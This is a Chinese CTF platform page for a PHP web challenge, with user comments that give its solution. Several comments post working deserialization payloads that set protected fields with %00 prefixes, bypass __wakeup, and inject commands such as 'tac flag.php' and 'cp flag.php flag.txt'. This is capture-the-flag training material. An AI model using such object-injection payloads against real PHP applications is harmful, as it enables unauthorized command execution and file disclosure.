安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2517
提  示:
描  述:
flag{}
评论
咖啡牛 3月前

这个题本身不难,只要会序列化处理和几个魔术方法的原理就可以了,反撇号吗,有意思

回复 0

kitniu 5月前

1.查看源代码,base64解码;2.打开.bak文件,查看源代码;3.翻译代码,要求传入code参数,反序列化后传入ctf ,username admin cat tac flag.php

回复 0

harry2025 8月前

http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

陈亮 9月前

flag{***}

回复 0

网恋秀牛子被录屏导致自卑 9月前

执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。

回复 0

admit 1年前

/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}

回复 1

iNMB 1年前

此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。

回复 2

iNMB 1年前

绕过__wakeup()后使用tac等其他输出字符的命令即可

回复 0

llc123 1年前

c\at flag.php也行

回复 0

pezn1and 1年前

code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

WriteUp

image
小赵同学

3 金币

评分(5)

解题动态

Kur0Ai1uro. 攻破了该题 2天前
CTF-大王 攻破了该题 4天前
这个昵称已存在 攻破了该题 4天前
星宇Sec 攻破了该题 5天前
LLX。 攻破了该题 5天前
Hgreen 攻破了该题 5天前
mahiru 攻破了该题 6天前
加州故事 攻破了该题 6天前
香克斯呀 攻破了该题 7天前
FanHuaJie 攻破了该题 9天前
w4nk3r 攻破了该题 11天前
乔qiao 攻破了该题 13天前
jwleft 攻破了该题 14天前
mystery 攻破了该题 15天前
Jazzyl 攻破了该题 16天前
CQchen 攻破了该题 16天前
ggsea 攻破了该题 19天前
凯哥 攻破了该题 19天前
zhzuo 攻破了该题 21天前
因吹斯听 攻破了该题 23天前
问题反馈